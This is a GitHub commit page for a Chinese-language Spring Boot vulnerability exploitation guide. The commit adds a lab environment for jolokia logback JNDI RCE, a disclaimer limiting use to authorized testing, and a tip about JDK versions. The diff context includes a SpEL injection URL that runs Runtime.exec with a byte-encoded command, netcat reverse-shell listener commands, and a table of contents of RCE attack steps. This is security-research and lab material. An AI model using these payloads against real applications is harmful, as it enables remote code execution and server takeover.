Skip to content

Navigation Menu

Sign in
Appearance settings

Search code, repositories, users, issues, pull requests...

Provide feedback

We read every piece of feedback, and take your input very seriously.

Saved searches

Use saved searches to filter your results more quickly

Sign up
Appearance settings

Commit b12ace1

Browse files
committed
add springboot-jolokia-logback-rce environment
1 parent 08bb401 commit b12ace1

File tree

9 files changed

+182
-53
lines changed

9 files changed

+182
-53
lines changed

‎README.md

Lines changed: 72 additions & 51 deletions
Original file line numberDiff line numberDiff line change
@@ -4,6 +4,12 @@ Spring Boot 相关漏洞学习资料,利用方法和技巧合集,黑盒安
44

55

66

7+
## 声明
8+
9+
> **⚠️ 本项目所有内容仅作为安全研究和授权测试使用, 相关人员对因误用和滥用该项目造成的一切损害概不负责**
10+
11+
12+
713
目录
814
-----------------
915

@@ -43,63 +49,64 @@ Spring Boot 相关漏洞学习资料,利用方法和技巧合集,黑盒安
4349
* [漏洞分析:](#%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90-1)
4450
* [漏洞环境:](#%E6%BC%8F%E6%B4%9E%E7%8E%AF%E5%A2%83)
4551
* [0x02:spring cloud SnakeYAML RCE](#0x02spring-cloud-snakeyaml-rce)
46-
* [<strong>利用条件:</strong>](#%E5%88%A9%E7%94%A8%E6%9D%A1%E4%BB%B6-3)
47-
* [<strong>利用方法:</strong>](#%E5%88%A9%E7%94%A8%E6%96%B9%E6%B3%95-3)
52+
* [利用条件:](#%E5%88%A9%E7%94%A8%E6%9D%A1%E4%BB%B6-3)
53+
* [利用方法:](#%E5%88%A9%E7%94%A8%E6%96%B9%E6%B3%95-3)
4854
* [步骤一: 托管 yml 和 jar 文件](#%E6%AD%A5%E9%AA%A4%E4%B8%80-%E6%89%98%E7%AE%A1-yml-%E5%92%8C-jar-%E6%96%87%E4%BB%B6)
4955
* [步骤二: 设置 spring\.cloud\.bootstrap\.location 属性](#%E6%AD%A5%E9%AA%A4%E4%BA%8C-%E8%AE%BE%E7%BD%AE-springcloudbootstraplocation-%E5%B1%9E%E6%80%A7)
5056
* [步骤三: 刷新配置](#%E6%AD%A5%E9%AA%A4%E4%B8%89-%E5%88%B7%E6%96%B0%E9%85%8D%E7%BD%AE)
51-
* [<strong>漏洞原理:</strong>](#%E6%BC%8F%E6%B4%9E%E5%8E%9F%E7%90%86-3)
57+
* [漏洞原理:](#%E6%BC%8F%E6%B4%9E%E5%8E%9F%E7%90%86-3)
5258
* [漏洞分析:](#%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90-2)
5359
* [漏洞环境:](#%E6%BC%8F%E6%B4%9E%E7%8E%AF%E5%A2%83-1)
5460
* [0x03:eureka xstream deserialization RCE](#0x03eureka-xstream-deserialization-rce)
55-
* [<strong>利用条件:</strong>](#%E5%88%A9%E7%94%A8%E6%9D%A1%E4%BB%B6-4)
56-
* [<strong>利用方法:</strong>](#%E5%88%A9%E7%94%A8%E6%96%B9%E6%B3%95-4)
61+
* [利用条件:](#%E5%88%A9%E7%94%A8%E6%9D%A1%E4%BB%B6-4)
62+
* [利用方法:](#%E5%88%A9%E7%94%A8%E6%96%B9%E6%B3%95-4)
5763
* [步骤一:架设响应恶意 XStream payload 的网站](#%E6%AD%A5%E9%AA%A4%E4%B8%80%E6%9E%B6%E8%AE%BE%E5%93%8D%E5%BA%94%E6%81%B6%E6%84%8F-xstream-payload-%E7%9A%84%E7%BD%91%E7%AB%99)
5864
* [步骤二:监听反弹 shell 的端口](#%E6%AD%A5%E9%AA%A4%E4%BA%8C%E7%9B%91%E5%90%AC%E5%8F%8D%E5%BC%B9-shell-%E7%9A%84%E7%AB%AF%E5%8F%A3)
5965
* [步骤三:设置 eureka\.client\.serviceUrl\.defaultZone 属性](#%E6%AD%A5%E9%AA%A4%E4%B8%89%E8%AE%BE%E7%BD%AE-eurekaclientserviceurldefaultzone-%E5%B1%9E%E6%80%A7)
6066
* [步骤四:刷新配置](#%E6%AD%A5%E9%AA%A4%E5%9B%9B%E5%88%B7%E6%96%B0%E9%85%8D%E7%BD%AE)
61-
* [<strong>漏洞原理:</strong>](#%E6%BC%8F%E6%B4%9E%E5%8E%9F%E7%90%86-4)
62-
* [<strong>漏洞分析:</strong>](#%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90-3)
67+
* [漏洞原理:](#%E6%BC%8F%E6%B4%9E%E5%8E%9F%E7%90%86-4)
68+
* [漏洞分析:](#%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90-3)
6369
* [漏洞环境:](#%E6%BC%8F%E6%B4%9E%E7%8E%AF%E5%A2%83-2)
64-
* [0x04:Jolokia logback JNDI RCE](#0x04jolokia-logback-jndi-rce)
65-
* [<strong>利用条件:</strong>](#%E5%88%A9%E7%94%A8%E6%9D%A1%E4%BB%B6-5)
66-
* [<strong>利用方法:</strong>](#%E5%88%A9%E7%94%A8%E6%96%B9%E6%B3%95-5)
70+
* [0x04:jolokia logback JNDI RCE](#0x04jolokia-logback-jndi-rce)
71+
* [利用条件:](#%E5%88%A9%E7%94%A8%E6%9D%A1%E4%BB%B6-5)
72+
* [利用方法:](#%E5%88%A9%E7%94%A8%E6%96%B9%E6%B3%95-5)
6773
* [步骤一:查看已存在的 MBeans](#%E6%AD%A5%E9%AA%A4%E4%B8%80%E6%9F%A5%E7%9C%8B%E5%B7%B2%E5%AD%98%E5%9C%A8%E7%9A%84-mbeans)
6874
* [步骤二:托管 xml 文件](#%E6%AD%A5%E9%AA%A4%E4%BA%8C%E6%89%98%E7%AE%A1-xml-%E6%96%87%E4%BB%B6)
6975
* [步骤三:准备要执行的 Java 代码](#%E6%AD%A5%E9%AA%A4%E4%B8%89%E5%87%86%E5%A4%87%E8%A6%81%E6%89%A7%E8%A1%8C%E7%9A%84-java-%E4%BB%A3%E7%A0%81)
7076
* [步骤四:架设恶意 ldap 服务](#%E6%AD%A5%E9%AA%A4%E5%9B%9B%E6%9E%B6%E8%AE%BE%E6%81%B6%E6%84%8F-ldap-%E6%9C%8D%E5%8A%A1)
7177
* [步骤五:监听反弹 shell 的端口](#%E6%AD%A5%E9%AA%A4%E4%BA%94%E7%9B%91%E5%90%AC%E5%8F%8D%E5%BC%B9-shell-%E7%9A%84%E7%AB%AF%E5%8F%A3)
7278
* [步骤六:从外部 URL 地址加载日志配置文件](#%E6%AD%A5%E9%AA%A4%E5%85%AD%E4%BB%8E%E5%A4%96%E9%83%A8-url-%E5%9C%B0%E5%9D%80%E5%8A%A0%E8%BD%BD%E6%97%A5%E5%BF%97%E9%85%8D%E7%BD%AE%E6%96%87%E4%BB%B6)
73-
* [<strong>漏洞原理:</strong>](#%E6%BC%8F%E6%B4%9E%E5%8E%9F%E7%90%86-5)
74-
* [<strong>漏洞分析:</strong>](#%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90-4)
75-
* [0x05:Jolokia Realm JNDI RCE](#0x05jolokia-realm-jndi-rce)
76-
* [<strong>利用条件:</strong>](#%E5%88%A9%E7%94%A8%E6%9D%A1%E4%BB%B6-6)
77-
* [<strong>利用方法:</strong>](#%E5%88%A9%E7%94%A8%E6%96%B9%E6%B3%95-6)
79+
* [漏洞原理:](#%E6%BC%8F%E6%B4%9E%E5%8E%9F%E7%90%86-5)
80+
* [漏洞分析:](#%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90-4)
81+
* [漏洞环境:](#%E6%BC%8F%E6%B4%9E%E7%8E%AF%E5%A2%83-3)
82+
* [0x05:jolokia Realm JNDI RCE](#0x05jolokia-realm-jndi-rce)
83+
* [利用条件:](#%E5%88%A9%E7%94%A8%E6%9D%A1%E4%BB%B6-6)
84+
* [利用方法:](#%E5%88%A9%E7%94%A8%E6%96%B9%E6%B3%95-6)
7885
* [步骤一:查看已存在的 MBeans](#%E6%AD%A5%E9%AA%A4%E4%B8%80%E6%9F%A5%E7%9C%8B%E5%B7%B2%E5%AD%98%E5%9C%A8%E7%9A%84-mbeans-1)
7986
* [步骤二:准备要执行的 Java 代码](#%E6%AD%A5%E9%AA%A4%E4%BA%8C%E5%87%86%E5%A4%87%E8%A6%81%E6%89%A7%E8%A1%8C%E7%9A%84-java-%E4%BB%A3%E7%A0%81)
8087
* [步骤三:架设恶意 rmi 服务](#%E6%AD%A5%E9%AA%A4%E4%B8%89%E6%9E%B6%E8%AE%BE%E6%81%B6%E6%84%8F-rmi-%E6%9C%8D%E5%8A%A1)
8188
* [步骤四:监听反弹 shell 的端口](#%E6%AD%A5%E9%AA%A4%E5%9B%9B%E7%9B%91%E5%90%AC%E5%8F%8D%E5%BC%B9-shell-%E7%9A%84%E7%AB%AF%E5%8F%A3)
8289
* [步骤五:发送恶意 payload](#%E6%AD%A5%E9%AA%A4%E4%BA%94%E5%8F%91%E9%80%81%E6%81%B6%E6%84%8F-payload)
83-
* [<strong>漏洞原理:</strong>](#%E6%BC%8F%E6%B4%9E%E5%8E%9F%E7%90%86-6)
84-
* [<strong>漏洞分析:</strong>](#%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90-5)
90+
* [漏洞原理:](#%E6%BC%8F%E6%B4%9E%E5%8E%9F%E7%90%86-6)
91+
* [漏洞分析:](#%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90-5)
8592
* [0x06:h2 database query RCE](#0x06h2-database-query-rce)
86-
* [<strong>利用条件:</strong>](#%E5%88%A9%E7%94%A8%E6%9D%A1%E4%BB%B6-7)
93+
* [利用条件:](#%E5%88%A9%E7%94%A8%E6%9D%A1%E4%BB%B6-7)
8794
* [利用方法:](#%E5%88%A9%E7%94%A8%E6%96%B9%E6%B3%95-7)
8895
* [步骤一:设置 spring\.datasource\.hikari\.connection\-test\-query 属性](#%E6%AD%A5%E9%AA%A4%E4%B8%80%E8%AE%BE%E7%BD%AE-springdatasourcehikariconnection-test-query-%E5%B1%9E%E6%80%A7)
8996
* [步骤二:重启应用](#%E6%AD%A5%E9%AA%A4%E4%BA%8C%E9%87%8D%E5%90%AF%E5%BA%94%E7%94%A8)
90-
* [<strong>漏洞原理:</strong>](#%E6%BC%8F%E6%B4%9E%E5%8E%9F%E7%90%86-7)
91-
* [<strong>漏洞分析:</strong>](#%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90-6)
97+
* [漏洞原理:](#%E6%BC%8F%E6%B4%9E%E5%8E%9F%E7%90%86-7)
98+
* [漏洞分析:](#%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90-6)
9299
* [0x07:mysql jdbc deserialization RCE](#0x07mysql-jdbc-deserialization-rce)
93-
* [<strong>利用条件:</strong>](#%E5%88%A9%E7%94%A8%E6%9D%A1%E4%BB%B6-8)
94-
* [<strong>利用方法:</strong>](#%E5%88%A9%E7%94%A8%E6%96%B9%E6%B3%95-8)
100+
* [利用条件:](#%E5%88%A9%E7%94%A8%E6%9D%A1%E4%BB%B6-8)
101+
* [利用方法:](#%E5%88%A9%E7%94%A8%E6%96%B9%E6%B3%95-8)
95102
* [步骤一:查看环境依赖](#%E6%AD%A5%E9%AA%A4%E4%B8%80%E6%9F%A5%E7%9C%8B%E7%8E%AF%E5%A2%83%E4%BE%9D%E8%B5%96)
96103
* [步骤二:架设恶意 rogue mysql server](#%E6%AD%A5%E9%AA%A4%E4%BA%8C%E6%9E%B6%E8%AE%BE%E6%81%B6%E6%84%8F-rogue-mysql-server)
97104
* [步骤三:设置 spring\.datasource\.url 属性](#%E6%AD%A5%E9%AA%A4%E4%B8%89%E8%AE%BE%E7%BD%AE-springdatasourceurl-%E5%B1%9E%E6%80%A7)
98105
* [步骤四:刷新配置](#%E6%AD%A5%E9%AA%A4%E5%9B%9B%E5%88%B7%E6%96%B0%E9%85%8D%E7%BD%AE-1)
99106
* [步骤五:触发数据库查询](#%E6%AD%A5%E9%AA%A4%E4%BA%94%E8%A7%A6%E5%8F%91%E6%95%B0%E6%8D%AE%E5%BA%93%E6%9F%A5%E8%AF%A2)
100107
* [步骤六:恢复正常 jdbc url](#%E6%AD%A5%E9%AA%A4%E5%85%AD%E6%81%A2%E5%A4%8D%E6%AD%A3%E5%B8%B8-jdbc-url)
101-
* [<strong>漏洞原理:</strong>](#%E6%BC%8F%E6%B4%9E%E5%8E%9F%E7%90%86-8)
102-
* [<strong>漏洞分析:</strong>](#%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90-7)
108+
* [漏洞原理:](#%E6%BC%8F%E6%B4%9E%E5%8E%9F%E7%90%86-8)
109+
* [漏洞分析:](#%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90-7)
103110

104111

105112

@@ -129,7 +136,7 @@ Spring Boot 相关漏洞学习资料,利用方法和技巧合集,黑盒安
129136

130137

131138

132-
#### `Spring Cloud``Spring Boot` 大版本之间的依赖关系:
139+
#### Spring Cloud 与 Spring Boot 大版本之间的依赖关系:
133140

134141
| Spring Cloud | Spring Boot |
135142
| ------------ | ------------------------------------ |
@@ -201,7 +208,7 @@ Spring Boot 相关漏洞学习资料,利用方法和技巧合集,黑盒安
201208

202209

203210

204-
**一般来讲,知道 springboot 应用的相关接口和传参信息并不能算是漏洞**;
211+
**一般来讲,知道 spring boot 应用的相关接口和传参信息并不能算是漏洞**;
205212

206213
但是可以检查暴露的接口是否存在未授权访问、越权或者其他业务型漏洞。
207214

@@ -516,11 +523,11 @@ http://127.0.0.1:9091/article?id=66
516523
http://127.0.0.1:9091/article?id=${T(java.lang.Runtime).getRuntime().exec(new%20String(new%20byte[]{0x6f,0x70,0x65,0x6e,0x20,0x2d,0x61,0x20,0x43,0x61,0x6c,0x63,0x75,0x6c,0x61,0x74,0x6f,0x72}))}
517524
```
518525

519-
526+
520527

521528
### 0x02:spring cloud SnakeYAML RCE
522529

523-
#### **利用条件:**
530+
#### 利用条件:
524531

525532
- 可以 POST 请求目标网站的 `/env` 接口设置属性
526533
- 可以 POST 请求目标网站的 `/refresh` 接口刷新配置(存在 `spring-boot-starter-actuator` 依赖)
@@ -529,7 +536,7 @@ http://127.0.0.1:9091/article?id=${T(java.lang.Runtime).getRuntime().exec(new%20
529536

530537

531538

532-
#### **利用方法:**
539+
#### 利用方法:
533540

534541
##### 步骤一: 托管 yml 和 jar 文件
535542

@@ -602,7 +609,7 @@ Content-Type: application/json
602609

603610

604611

605-
#### **漏洞原理:**
612+
#### 漏洞原理:
606613

607614
1. spring.cloud.bootstrap.location 属性被设置为外部恶意 yml 文件 URL 地址
608615
2. refresh 触发目标机器请求远程 HTTP 服务器上的 yml 文件,获得其内容
@@ -633,7 +640,7 @@ http://127.0.0.1:9092/env
633640

634641
### 0x03:eureka xstream deserialization RCE
635642

636-
#### **利用条件:**
643+
#### 利用条件:
637644

638645
- 可以 POST 请求目标网站的 `/env` 接口设置属性
639646
- 可以 POST 请求目标网站的 `/refresh` 接口刷新配置(存在 `spring-boot-starter-actuator` 依赖)
@@ -642,7 +649,7 @@ http://127.0.0.1:9092/env
642649

643650

644651

645-
#### **利用方法:**
652+
#### 利用方法:
646653

647654
##### 步骤一:架设响应恶意 XStream payload 的网站
648655

@@ -704,15 +711,15 @@ Content-Type: application/json
704711

705712

706713

707-
#### **漏洞原理:**
714+
#### 漏洞原理:
708715

709716
1. eureka.client.serviceUrl.defaultZone 属性被设置为恶意的外部 eureka server URL 地址
710717
2. refresh 触发目标机器请求远程 URL,提前架设的 fake eureka server 就会返回恶意的 payload
711718
3. 目标机器相关依赖解析 payload,触发 XStream 反序列化,造成 RCE 漏洞
712719

713720

714721

715-
#### **漏洞分析:**
722+
#### 漏洞分析:
716723

717724
[Spring Boot Actuator从未授权访问到getshell](https://www.freebuf.com/column/234719.html)
718725

@@ -730,9 +737,9 @@ http://127.0.0.1:9093/env
730737

731738

732739

733-
### 0x04:Jolokia logback JNDI RCE
740+
### 0x04:jolokia logback JNDI RCE
734741

735-
#### **利用条件:**
742+
#### 利用条件:
736743

737744
- 目标网站存在 `/jolokia``/actuator/jolokia` 接口
738745
- 目标使用了 `jolokia-core` 依赖(版本要求暂未知)并且环境中存在相关 MBean
@@ -742,7 +749,7 @@ http://127.0.0.1:9093/env
742749

743750

744751

745-
#### **利用方法:**
752+
#### 利用方法:
746753

747754
##### 步骤一:查看已存在的 MBeans
748755

@@ -809,6 +816,8 @@ nc -lv 443
809816

810817
##### 步骤六:从外部 URL 地址加载日志配置文件
811818

819+
> ⚠️ 如果目标成功请求了example.xml 并且 marshalsec 也接收到了目标请求,但是目标没有请求 JNDIObject.class,大概率是因为目标环境的 jdk 版本太高,导致 JNDI 利用失败。
820+
812821
替换实际的 your-vps-ip 地址访问 URL 触发漏洞:
813822

814823
```
@@ -817,7 +826,7 @@ nc -lv 443
817826

818827

819828

820-
#### **漏洞原理:**
829+
#### 漏洞原理:
821830

822831
1. 直接访问可触发漏洞的 URL,相当于通过 jolokia 调用 `ch.qos.logback.classic.jmx.JMXConfigurator` 类的 `reloadByURL` 方法
823832
2. 目标机器请求外部日志配置文件 URL 地址,获得恶意 xml 文件内容
@@ -827,15 +836,27 @@ nc -lv 443
827836

828837

829838

830-
#### **漏洞分析:**
839+
#### 漏洞分析:
831840

832841
[spring boot actuator rce via jolokia](https://xz.aliyun.com/t/4258)
833842

834843

835844

836-
### 0x05:Jolokia Realm JNDI RCE
845+
#### 漏洞环境:
846+
847+
[repository/springboot-jolokia-logback-rce](https://github.com/LandGrey/SpringBootVulExploit/tree/master/repository/springboot-jolokia-logback-rce)
848+
849+
正常访问:
850+
851+
```
852+
http://127.0.0.1:9094/env
853+
```
854+
855+
837856

838-
#### **利用条件:**
857+
### 0x05:jolokia Realm JNDI RCE
858+
859+
#### 利用条件:
839860

840861
- 目标网站存在 `/jolokia``/actuator/jolokia` 接口
841862
- 目标使用了 `jolokia-core` 依赖(版本要求暂未知)并且环境中存在相关 MBean
@@ -844,7 +865,7 @@ nc -lv 443
844865

845866

846867

847-
#### **利用方法:**
868+
#### 利用方法:
848869

849870
##### 步骤一:查看已存在的 MBeans
850871

@@ -884,7 +905,7 @@ nc -lvp 443
884905

885906

886907

887-
#### **漏洞原理:**
908+
#### 漏洞原理:
888909

889910
1. 利用 jolokia 调用 createJNDIRealm 创建 JNDIRealm
890911
2. 设置 connectionURL 地址为 RMI Service URL
@@ -894,15 +915,15 @@ nc -lvp 443
894915

895916

896917

897-
#### **漏洞分析:**
918+
#### 漏洞分析:
898919

899920
[Yet Another Way to Exploit Spring Boot Actuators via Jolokia](https://static.anquanke.com/download/b/security-geek-2019-q1/article-10.html)
900921

901922

902923

903924
### 0x06:h2 database query RCE
904925

905-
#### **利用条件:**
926+
#### 利用条件:
906927

907928
- 可以 POST 请求目标网站的 `/env` 接口设置属性
908929
- 可以 POST 请求目标网站的 `/restart` 接口重启应用(存在 spring-boot-starter-actuator 依赖)
@@ -958,7 +979,7 @@ Content-Type: application/json
958979

959980

960981

961-
#### **漏洞原理:**
982+
#### 漏洞原理:
962983

963984
1. spring.datasource.hikari.connection-test-query 属性被设置为一条恶意的 `CREATE ALIAS` 创建自定义函数的 SQL 语句
964985
2. 其属性对应 HikariCP 数据库连接池的 connectionTestQuery 配置,定义一个新数据库连接之前被执行的 SQL 语句
@@ -967,15 +988,15 @@ Content-Type: application/json
967988

968989

969990

970-
#### **漏洞分析:**
991+
#### 漏洞分析:
971992

972993
[remote-code-execution-in-three-acts-chaining-exposed-actuators-and-h2-database](https://spaceraccoon.dev/remote-code-execution-in-three-acts-chaining-exposed-actuators-and-h2-database)
973994

974995

975996

976997
### 0x07:mysql jdbc deserialization RCE
977998

978-
#### **利用条件:**
999+
#### 利用条件:
9791000

9801001
- 可以 POST 请求目标网站的 `/env` 接口设置属性
9811002
- 可以 POST 请求目标网站的 `/refresh` 接口刷新配置(存在 `spring-boot-starter-actuator` 依赖)
@@ -984,7 +1005,7 @@ Content-Type: application/json
9841005

9851006

9861007

987-
#### **利用方法:**
1008+
#### 利用方法:
9881009

9891010
##### 步骤一:查看环境依赖
9901011

@@ -1080,7 +1101,7 @@ Content-Type: application/json
10801101

10811102

10821103

1083-
#### **漏洞原理:**
1104+
#### 漏洞原理:
10841105

10851106
1. spring.datasource.url 属性被设置为外部恶意 mysql jdbc url 地址
10861107
2. refresh 刷新后设置了一个新的 spring.datasource.url 属性值
@@ -1090,7 +1111,7 @@ Content-Type: application/json
10901111

10911112

10921113

1093-
#### **漏洞分析:**
1114+
#### 漏洞分析:
10941115

10951116
[New-Exploit-Technique-In-Java-Deserialization-Attack](https://i.blackhat.com/eu-19/Thursday/eu-19-Zhang-New-Exploit-Technique-In-Java-Deserialization-Attack.pdf)
10961117

‎repository/springboot-eureka-xstream-rce/src/main/java/landgrey/Application.java renamed to ‎repository/springboot-eureka-xstream-rce/src/main/java/code/landgrey/Application.java

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -1,4 +1,4 @@
1-
package landgrey;
1+
package code.landgrey;
22

33
import org.springframework.boot.SpringApplication;
44
import org.springframework.boot.autoconfigure.SpringBootApplication;

‎repository/springboot-eureka-xstream-rce/src/main/java/landgrey/controller/Article.java renamed to ‎repository/springboot-eureka-xstream-rce/src/main/java/code/landgrey/controller/Article.java

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -1,4 +1,4 @@
1-
package landgrey.controller;
1+
package code.landgrey.controller;
22

33
import org.springframework.boot.autoconfigure.EnableAutoConfiguration;
44
import org.springframework.web.bind.annotation.RequestMapping;

0 commit comments

Comments
(0)

AltStyle によって変換されたページ (->オリジナル) /